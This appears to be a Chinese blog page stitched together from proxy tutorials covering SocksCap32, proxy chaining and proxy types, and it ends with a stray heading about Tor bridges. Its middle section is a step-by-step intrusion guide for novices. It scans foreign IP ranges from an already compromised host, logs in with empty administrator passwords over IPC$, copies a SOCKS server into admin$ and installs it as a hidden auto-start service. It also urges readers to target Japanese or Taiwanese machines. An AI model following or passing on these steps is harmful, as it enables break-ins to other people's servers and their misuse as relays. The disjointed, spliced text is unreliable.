socksca教程，socksca使用教程

洒脱 2022-11-22 22:37:01 329

SharkStorm Security Lab SocksCap32 使用详解 Socks代理服务器／网关在日常工作中占有举足轻重的地位：既可以当作局域网内计算机访问Internet的网关，又可以当作隐藏真实身份的挡箭牌／防火墙／堡垒机。但由于Socks在日常应用中远不及HTTP代理应用广泛，因此许多网友都对此了解甚少，今天好不容易抽出点时间就写了篇教程，希望对大家有用。

首先还是先说说什么是Socks吧。

Socks是DavidKoblas在1990年开发的网关，自此之后就一直作为Internet RFC 中的开放标准。Socks属于TCP层，不同于HTTP，此外与Winsock不同的是，Socks不要求应用程序遵循特定的操作系统，比如象Winsock那样遵循Windows。Socks代理与应用层代理、HTTP层代理不同，Socks代理只是简单地传递数据包，而不关心传输的是何种协议，所以Socks代理服务器比应用层代理服务器要快得多。正因为Socks代理服务器有这样的功能我们才可以通过它来连接Internet。

（SocksCap32就是这样一种客户端软件）。我们常用到有的Socks有Socks4和Socks5两种版本。其中Socks4代理只支持TCP／IP协议；不支持加密；只支持IP地址。

而Socks5代理支持TCP/IP和UDP协议，还支持各种身份验证机制，服务器端域名解析等。Socks4能做的Socks5都可以做，如：OICQ只能用Socks5代理，而IE/Ftp既可以用Socks4也可以用Socks5。SocksCap32是小日本NEC公司开发的一个使所有基于Winsock的应用都可以使用Socks代理的工具。

它之所以叫做SocksCap就是指给调用Winsock的应用程序加上了个“Cap(帽子)”，所有在SocksCap Shell（环境）下应用程序产生的对Winsock的调用都会被SockCap32截获，自动转化为向指定Socks代理的请求，如此，你的原先不支持socks代理的应用程序也可以用Socks代理了。SockCap32支持Socks4和Socks5代理，但一般情况下在网上开放的都是Socks4代理，除了Oicq（Oicq使用UDP协议，UDP的优点我就不写了）外其他的软件基本都可以支持。好了，背景资料就说这么多吧，我们进入正题。

为了方便菜鸟学习我还是从安装讲起吧，（别拿砖头拍我，我可不是多写字赚稿费呀。

端口扫描、跳板的详细教程！

特别提醒：千万不要做国内的主机啊！做日本或者阿扁（台湾）吧，这样既不违反我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过最好还是老老实实的做跳板，不要总是去想着做什么坏事。千万不要用国内的主机做试验啊，否则等着警车来接你啦怎样制作代理跳板说明：（1）这篇文章是我自己做跳板的一点体会，是些给那些从来没有做过跳板的网友看的。

做过跳板的网友就不用看了。

（2）本文讲述的是做跳板最简单，最基础的方法，仅仅是给新手提供一个思路，一些稍微复杂的方法比如unicode，CGI等等这里不讲。（3）做跳板毕竟算是一种入侵行为，有了跳板和肉鸡以后，千万要用在该用的地方，不要刻意去“黑“别人啊！！准备工作：做一件事情，至少需要两个方面的准备工作：相关的基础知识和做这件事情的工具。基本的工具：（1）x-scan v1.3：强大的漏洞扫描工具，对于初学者来说非常好的一个工具。我们主要用他来扫描一些基本的漏洞（主要是NT弱密码），用法在后面会具体说。

（其实流光很不错的，但是我觉得流光再扫NT弱密码的时候太烦了）（2）superscan：非常快速的端口扫描工具，可以在很短的时间里发现某个IP域上IP的分布。为什么用他呢？主要是避免盲目扫描，提高效率：某个 IP域上IP地址的分布不是连续的，也许他从xxx.xxx.0.0-xxx.xxx.50.255上每个IP都是有计算机存在的，而从 xxx.xxx.51.0- xxx.xxx.100.255每个IP都没有计算机存在。如果你事先不知道这一段上根本没有主机的话，花了很长时间去扫描也不会有结果,浪费时间和金钱啊。

（3）fluxay 4.0：大名鼎鼎的扫描工具，我们主要用它的NT管道命令功能来连接目标主机，以及添加用户、远程启动服务等。注意了：最好是fluxay 4.0版本。（4）windows2000下的c:\命令提示符工具：也就是说，跳板的制作至少是要在windows2000以上的操作系统下进行。

（5）sksockserver.exe：做跳板的主角，就是用它来实现远程主机的socks5代理功能的。（6）全球IP地址分配表：这个对于高手来说是不必要的，用他的目的是考虑到很多以前没有做过跳板的网友对IP的分布不了解，我们主要的目标还是国外的主机，因此对国外的IP分布有一些了解是很重要的，也是以后我们选定所要扫描的IP域的主要根据。这样的话，就省得再去用“追捕”软件查找IP的实际所在地了。

好了工具准备完了，现在了解一下做跳板的大概过程。注意：刚才你下载的这些东东不是放在你的硬盘上！放在什么地方呢？放在“肉鸡”上！就是说我们做跳板的过程是在肉鸡上完成的。名词解释肉鸡：肉鸡是开了3389端口微软终端服务（microsoft terminal service），又有弱密码的高速服务器，俗称“肉鸡”。我们之所以要在肉鸡上做，是出于安全考虑，因为做跳板毕竟是一种非法入侵行为，我们需要隐藏自己的踪迹，当然，不想用肉鸡也可以，前提是你有足够的带宽，而且不怕公安上门找你麻烦。

（当然，进入肉鸡本身也是一种非法的入侵）。我们用 mstsc.exe这个软件登陆上肉鸡，就可以像平时我们在自己电脑上一样用鼠标控制远程的服务器（也就是肉鸡）做我们要做的事情。过程：为了叙述的方便，先假设我们已经有了一个肉鸡。下面的步骤没有特殊说明都是在“肉鸡”上完成的。

（1）先在自己的机器上打开全球IP地址分配表，选取一个IP区域（2）登陆上肉鸡，把刚才说到的工具在肉鸡上下载好，就用肉鸡自己的IE下载就行了。（3）主要的过程是：先用superscan扫描（1）选定的IP区域，找到其中一个IP很集中的区域，然后放到x-scan进行漏洞扫描（因为是面对以前没有做过跳板的网友，所以这里只介绍用NT弱密码制作跳板），找到若干个有弱密码的IP，把sksockserver.exe上传到目标主机上，然后远程启动 sksockserver。这样，跳板就做好了。我们一起来实践一下，做一个跳板：（1）刚才说过了，没有肉鸡做跳板是不行的，尤其是拨号上网的网友（速度慢）。

我们首先登陆上一个已经知道的肉鸡：xxx.xxx.xxx.xxx。帮刚才上面提到的东东都准备好。最好是集中放置，这样便于我们使用。

不要到处乱放，否则主人一进来就知道有人进过他的机器。（2）我们选择210.85.0.0-210.85.50.255这一段IP（台湾），放在superscan里面去，把superscan的端口设置改成只有 80一个端口，然后确定，开始扫描。这时，在下面的输出框里面，就会出现一大批的活跃IP，看见了吗？210.85.0.0-210.85.40.255 这一段上都是活跃的IP。

现在我们随便选一个IP区域，比如我们就选210.85.0.0-210.85.5.255这一段，不要太长，因为下一步我们要把他们放进x-scan进行扫描，x-scan扫描速度并不是很快，太多的话，会降低效率，而且IP区域过长的话，有可能使x-scan出现误报。 x-scan的使用方法这里就不详细叙述了这里要做的就是：在“设置”菜单里，先选“扫描模块”，选择“开放端口”和“NT弱密码”两个选项，在“扫描参数”里，填上我们刚才选定的IP范围：210.85.0.0-210.85.5.255，接着，在其中“端口相关设置”里，把原先一长串的端口去掉，只填上80，3389两个端口，其他的设置就用默认的好了，不用再改了。然后就开始搜索，这需要大概你8、9分钟的时间（因为x-scan虽然简单，但是速度慢），这段时间你大可以做一点自己的其他事情，等时间差不多了，你再看看x-scan里面的结果：好的，N个机器的密码为空，这下子有收获了！但是要说的是，x-scan有一些误报，大家一定要有耐心去试啊！（3）我们随便从中间随便选了一个，比如：210.85.0.14：administrator 空。接下来的事情，是要验证它到底接不接受我们的连接，密码是不是正确。

现在用到流光了，打开流光，选择“工具”里面的“ＮＴ管道远程命令”，出现对话框，把刚才的ＩＰ，用户名，密码填进去，然后回车。在界面上“ＮＴＣＭＤ>”提示符后面打入ＣＭＤ，连接成功，屏幕上出现了“Ｃ：\ＷＩＮＮＴ\ ＳＹＳＴＥＭ３２>”的提示符。这证明，刚才的用户名和密码是正确的，这台机器已经基本是你的了。

好了，我们进去了，想想我们要做什么呢？对了，是做跳板，我们还要把sksockserver.exe放到210.85.0.14上，这样才能启动服务，让这台机器做为跳板！怎么把这个东东放上去呢：调出肉鸡上的ＣＭＤ，在命令提示符下按下面的方法做： c:\net use \\210.85.0.14\ipc$ “”/user:“administrator”（建立IPC连接）系统提示：命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系统提示：成功复制一个文件。这样我们就成功地把sksockserver.exe传到了目标主机上。接下来的任务就是把他远程启动就行了。

我们又回到刚才流光的NTCMD里，在提示符下按下面的方法做： c:\sksockserver –install 系统提示：snake sockproxy service installed c:\sksockserver –config port 1949（端口自己来定，这里的1949是随便选的）系统提示：the port value have set to 1949 c:\sksockserver –config starttype 2 系统提示：the starttype have set to 2---auto c:\net start skserver 系统提示服务启动成功。这个时候，这台机器已经成为你的跳板了。下面简单的说一说自己找肉鸡的方法。

工具：（1）sockscap：强大的socks代理调度软件。（2）snake的代理跳板GUI（图形界面程序）（3。

任何使用多层代理上网

可以使用socks2http和sockscap两款软件来达到这个目的，或者使用httport也可以如果要用三级代理则需要三个一块用二级代理的设置方法有一点需要注意的是：并不是所有的代理都能用作一级代理，只有支持SSL(Secure Socket Layer,一种提供通信保密的安全性协议)的HTTP代理才行。一句话：一级代理用支持SSL的免费HTTP代理，二级代理用下载文献的国外代理！。

Httport中二级代理设置简介以202.120.25.36:8080作为一级代理为例，首先在代理页面将202.120.25.36填入主机名或IP地址栏中，别忘了填端口。

勾选身份验证，填入用户名和密码（免费代理随便填）。用户代理选IE，用过SSL连接模式，其余不填。二级代理设置在端口映射菜单。"外部HTTP代理"下面的就是你要用的二级代理了，比如2.25.56.58:80。

即"远程主机"里填上2.25.56.58,"远程端口"就是80，至于那个"本地端口"，比如用3128，那么你在IE里设代理localhost:3128 。点击左边那个的"开始"就行了。Httport下载：http://202.38.64.10/~adamxc/zip/httport3.zip2.HTTP代理转为SOCKS代理首先向大家推荐两个软件:sockscap和socks2http。

sockscap我想就不用多说了吧，如果你有socks代理,用了这个自然就能实现二级代理，不过socks代理倒是不多。而socks2http是用http代理模拟socks5代理. 比如用202.38.64.4:8080做socks代理，在socks2http设置中如是填入后，填入你的帐号和密码。再点击 "完成"即可。

使用时，在你所用的软件中的socks5代理栏处填入localhost，端口1080。这样你所用的自然就是202.38.64.4的socks代理了。或者运行sockscap，在socks代理设置中填localhost，注意只能用socks5，不能做socks4代理。

用http模拟的socks代理限于很少的一些网络软件。网页浏览没什么问题(注意IE4不支持sockacap)，可telnet(能使用另外一台电脑上程序如游戏的传输),ftp(文本传输)就不一定了，好像只有本身支持socks代理的软件才行。建议在telnet时使用Sterm1.0，在ftp时用Absoluteftp。注意需要使用二级代理的软件，一定要在sockscap里运行，你所用的第一级代理才能生效。

用了这个法子，好处可多多哟！特别是使用64.4的大侠们。用它telnet，ftp前面已述。当教育网那条路断了时，用64.4还是可以的，特别是可以不再有什么几条线程的限制了，也没有什么不能下载mp3及rm文件的限制了，不信你试试看！只是有点遗憾不能用这个方法上oicq！我想有了这个方法后,大家再也不用愁什么二级代理的问题了吧。象你如果用64.4模拟成socks5后，照上述方法，再用一个国内的免费代理，连出国，速度也还不马马虎虎，只是你的钞票会哗啦哗啦往外流得少一点了吧！下载socks2http：http://mail.ustc.edu.cn/~adamxc/zip/s2h.zip下载sockscap：http://mail.ustc.edu.cn/~adamxc/zip/SocksCap32.zip3.三级代理对于一些没有出校IP，只有学校代理的朋友，得要用三级代理。

设置三级代理就得要httport+socks2http+ sockscap一起用了。先搜索校内可用的代理，例如：202.120.25.36（假设），在httport中用第一级202.120.25.36；或申请国内浏览服务器（注意要填上你的帐号和密码）。第二级用支持SSL的免费代理，在httport的"端口映射"=>外部http代理"中设定。然后在socks2http里用代理localhost，端口就是你在上述"外部http代理"中你用的本地端口（202.120.25.36）。

下面就是用sockscap,在里面启动IE，那个能下载文献的代理就往IE里设代理的地方填吧。

如何通过代理使用无代理设置的客户端？

代理嘛，最常见的就是服务器代理了，可以和别人共享宽带，很省钱的哦那么一、什么是代理服务器？代理服务器英文全称是Proxy Server，其功能就是代理网络用户去取得网络信息。形象的说：它是网络信息的中转站。

在一般情况下，我们使用网络浏览器直接去连接其他Internet站点取得网络信息时，需送出Request信号来得到回答，然后对方再把信息以bit方式传送回来。

代理服务器是介于浏览器和Web服务器之间的一台服务器，有了它之后，浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求， Request信号会先送到代理服务器，由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且，大部分代理服务器都具有缓冲的功能，就好象一个大的Cache，它有很大的存储空间，它不断将新取得数据储存到它本机的存储器上，如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的，那么它就不重新从Web服务器取数据，而直接将存储器上的数据传送给用户的浏览器，这样就能显著提高浏览速度和效率。更重要的是：Proxy Server (代理服务器)是 Internet链路级网关所提供的一种重要的安全功能，它的工作主要在开放系统互联 (OSI) 模型的对话层。二、代理服务器的分类 1、HTTP代理按匿名功能分类。

是否具有隐藏IP的功能。非匿名代理：不具有匿名功能。匿名代理。

使用此种代理时，虽然被访问的网站不能知道你的IP地址，但仍然可以知道你在使用代理，有些侦测IP的网页也仍然可以查到你的IP。高度匿名代理：使用此种代理时，被访问的网站不知道你的IP地址，也不知道你在使用代理进行访问。此种代理的隐藏IP地址的功能最强。

2、按请求信息的安全性分类全匿名代理：不改变你的request fields（报文），使服务器端看来就像有个真正的客户浏览器在访问它。当然，你的真实IP是隐藏起来的。服务器的网管不会认为你使用了代理。

普通匿名代理：能隐藏你的真实IP，但会更改你的request fields，有可能会被认为使用了代理，但仅仅是可能，一般说来是没问题的。不过不要受它的名字的误导，其安全性可能比全匿名代理更高，有的代理会剥离你的部分信息（就好比防火墙的stealth mode），使服务器端探测不到你的操作系统版本和浏览器版本。 elite代理：匿名隐藏性更高，可隐藏系统及浏览器资料信息等。此种代理安全性特强。

透明代理（简单代理）：透明代理的意思是客户端根本不需要知道有代理服务器的存在，它改编你的request fields（报文），并会传送真实IP。注意，加密的透明代理则是属于匿名代理，意思是不用设置使用代理了，例如Garden 2程序。 3、按代理服务器的用途分类 1）Http代理：代理客户机的http访问，主要代理浏览器访问网页，它的端口一般为80、8080、3128等。 2）SSL代理:支持最高128位加密强度的http代理，可以作为访问加密网站的代理。

加密网站是指以https://开始的网站。ssl的标准端口为443。 3）HTTP CONNECT代理：允许用户建立TCP连接到任何端口的代理服务器，这种代理不仅可用于HTTP，还包括FTP、IRC、RM流服务等。 4）FTP代理：代理客户机上的ftp软件访问ftp服务器，其端口一般为21、2121。

5）POP3代理：代理客户机上的邮件软件用pop3方式收邮件，其端口一般为110。 6）Telnet代理：能够代理通信机的telnet，用于远程控制，入侵时经常使用。其端口一般为23。

7）Socks代理：是全能代理，就像有很多跳线的转接板，它只是简单地将一端的系统连接到另外一端。支持多种协议，包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型，socks 4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份验证机制等协议。

其标准端口为1080。 socks代理相应的采用socks协议的代理服务器就是SOCKS服务器，是一种通用的代理服务器。Socks是个电路级的底层网关，是 DavidKoblas在1990年开发的，此后就一直作为Internet RFC标准的开放标准。Socks不要求应用程序遵循特定的操作系统平台，Socks 代理与应用层代理、 HTTP 层代理不同，Socks代理只是简单地传递数据包，而不必关心是何种应用协议（比如FTP、HTTP和NNTP请求）。

所以，Socks代理比其他应用层代理要快得多。它通常绑定在代理服务器的1080端口上。如果您在企业网或校园网上，需要透过防火墙或通过代理服务器访问Internet就可能需要使用 SOCKS。

一般情况下，对于拨号上网用户都不需要使用它。注意，浏览网页时常用的代理服务器通常是专门的http代理，它和SOCKS是不同的。因此，您能浏览网页不等于您一定可以通过SOCKS访问Internet。常用的防火墙，或代理软件都支持SOCKS，但需要其管理员打开这一功能。

如果您不确信您是否需要SOCKS或是否有SOCKS可用，请与您的网络管理员联系。为了使用socks，您需要了解一下内容： ① SOCKS服务器的IP地址 ② SOCKS服务所在的端口 ③ 这个SOCKS服务是否需要用户认证？如果需要，您要向您的网络管理员申请一个用户和口令知道了上述信息，您就可以把这些信息填入“网络配置”中，或者在第一次登记时填入，您就可以使用socks代理了。在实际应用中SOCKS代理可以用作为：电子邮件、新闻组软件、网络传呼ICQ、网络聊天MIRC和使用代理服务器上联众打游戏等等各种游戏应用软件当中。

8）TUNNEL代理：经HTTPTunnet程序转换的数据包封装成http请求（Request）来穿透防火墙，允许利用HTTP服务器做任何TCP可以做的事情，功能相当于Socks5。 9）文献代理：可以用来查询数据库的代理，通过这些代理，可以获得互联网的相关科研学术的数据库资源，例如查询Sciencedirect网站（简称SD）�。

如何获取tor的网桥？